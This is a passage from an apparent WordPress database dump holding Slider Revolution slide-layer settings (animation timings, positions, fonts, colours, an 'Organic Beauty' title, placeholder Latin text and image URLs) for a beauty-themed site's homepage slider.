ace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"8\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"Button\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"v\":\"506px\",\"e\":true},\"n\":{\"v\":\"506px\",\"e\":true},\"t\":{\"v\":\"506px\",\"e\":true},\"m\":{\"v\":\"506px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"506px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-367px\",\"e\":true},\"n\":{\"v\":\"-243px\",\"e\":true},\"t\":{\"v\":\"-42px\",\"e\":true},\"m\":{\"v\":\"167px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"114px\",\"e\":true},\"n\":{\"v\":\"152px\",\"e\":true},\"t\":{\"v\":\"281px\",\"e\":true},\"m\":{\"v\":\"148px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"9\":{\"text\":\"Pri ne dicant bonorum. Vituperata ullamcorper deterruisset ius at, ea nam justo errem, per ex noster equidem iracundia. Ea ornatus inimicus salutandi duo, modo domi.\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":9,\"size\":{\"width\":{\"d\":{\"v\":\"575px\",\"e\":true},\"n\":{\"v\":\"526px\",\"e\":true},\"t\":{\"v\":\"539px\",\"e\":true},\"m\":{\"v\":\"539px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"v\":\"69px\",\"e\":true},\"t\":{\"v\":\"69px\",\"e\":true},\"m\":{\"v\":\"69px\"}},\"originalWidth\":\"575px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-333px\",\"e\":true},\"n\":{\"v\":\"-234px\",\"e\":true},\"t\":{\"v\":\"-26px\",\"e\":true},\"m\":{\"v\":\"-26px\"}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"45px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"198px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":620},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\"},\"10\":{\"text\":\"Organic Beauty\",\"alias\":\"Title\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"397px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-325px\",\"e\":true},\"n\":{\"v\":\"-203px\",\"e\":true},\"t\":{\"v\":\"-19px\",\"e\":true},\"m\":{\"v\":\"7px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-86px\",\"e\":true},\"n\":{\"v\":\"-45px\",\"e\":true},\"t\":{\"v\":\"137px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":13,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":550},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1650,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"45px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"70px\",\"e\":true},\"t\":{\"v\":\"40px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"11\":{\"text\":\"Image 14\",\"alias\":\"Cvetic\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic3.png\",\"imageId\":3238},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"88px\",\"e\":true},\"t\":{\"v\":\"86px\",\"e\":true},\"m\":{\"v\":\"86px\"}},\"height\":{\"d\":{\"v\":\"108px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"77px\",\"e\":true},\"m\":{\"v\":\"77px\"}},\"originalWidth\":120,\"originalHeight\":108,\"aspectRatio\":{\"d\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"n\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"t\":{\"v\":1.111111111111111160454356650006957352161407470703125},\"m\":{\"v\":1.111111111111111160454356650006957352161407470703125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-557px\",\"e\":true},\"n\":{\"v\":\"-450px\",\"e\":true},\"t\":{\"v\":\"-249px\",\"e\":true},\"m\":{\"v\":\"-249px\"}},\"y\":{\"d\":{\"v\":\"-189px\",\"e\":true},\"n\":{\"v\":\"-127px\",\"e\":true},\"t\":{\"v\":\"31px\",\"e\":true},\"m\":{\"v\":\"31px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":14,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":480},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(10,4,3,'{\"title\":\"third\",\"bg\":{\"type\":\"solid\",\"color\":\"#f6cfcd\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"1\":{\"text\":\"Image 